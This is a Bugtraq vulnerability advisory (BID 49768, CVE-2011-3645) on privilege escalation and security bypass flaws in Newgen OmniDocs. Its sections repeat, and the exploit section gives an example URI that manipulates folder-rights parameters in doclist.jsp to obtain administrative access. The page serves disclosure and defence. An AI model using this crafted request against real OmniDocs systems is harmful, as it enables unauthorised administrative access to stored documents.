Newgen Software OmniDocs Privilege Escalation and Security Bypass Vulnerabilities
BID:49768
Info
Newgen Software OmniDocs Privilege Escalation and Security Bypass Vulnerabilities
| Bugtraq ID: | 49768 |
| Class: | Input Validation Error |
| CVE: |
CVE-2011-3645 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 26 2011 12:00AM |
| Updated: | Sep 26 2011 12:00AM |
| Credit: | Sohil Garg |
| Vulnerable: |
Newgen Software OmniDocs 0 |
| Not Vulnerable: | |
Discussion
Newgen Software OmniDocs Privilege Escalation and Security Bypass Vulnerabilities
Newgen Software OmniDocs is prone to a privilege escalation vulnerability and a security bypass vulnerability.
Exploiting these issues will allow attackers to gain administrative access to the affected application and bypass certain security restrictions. Other attacks are also possible.
Newgen Software OmniDocs is prone to a privilege escalation vulnerability and a security bypass vulnerability.
Exploiting these issues will allow attackers to gain administrative access to the affected application and bypass certain security restrictions. Other attacks are also possible.
Exploit / POC
Newgen Software OmniDocs Privilege Escalation and Security Bypass Vulnerabilities
Attackers may launch attacks through a browser.
The following example URI is available:
http://www.example.com/omnidocs/doccab/doclist.jsp?DocListFolderId=927964&FolderType=G&FolderRights=010000000&FolderName=1234&FolderOwner=test&FolderLocation=G&Fold
erAccessType=I&ParentFolderIndex=100&FolderPathFlag=Y&Fetch=5&VolIndex=1&VolIndex=1
Attackers may launch attacks through a browser.
The following example URI is available:
http://www.example.com/omnidocs/doccab/doclist.jsp?DocListFolderId=927964&FolderType=G&FolderRights=010000000&FolderName=1234&FolderOwner=test&FolderLocation=G&Fold
erAccessType=I&ParentFolderIndex=100&FolderPathFlag=Y&Fetch=5&VolIndex=1&VolIndex=1
Solution / Fix
Newgen Software OmniDocs Privilege Escalation and Security Bypass Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Newgen Software OmniDocs Privilege Escalation and Security Bypass Vulnerabilities
References:
References: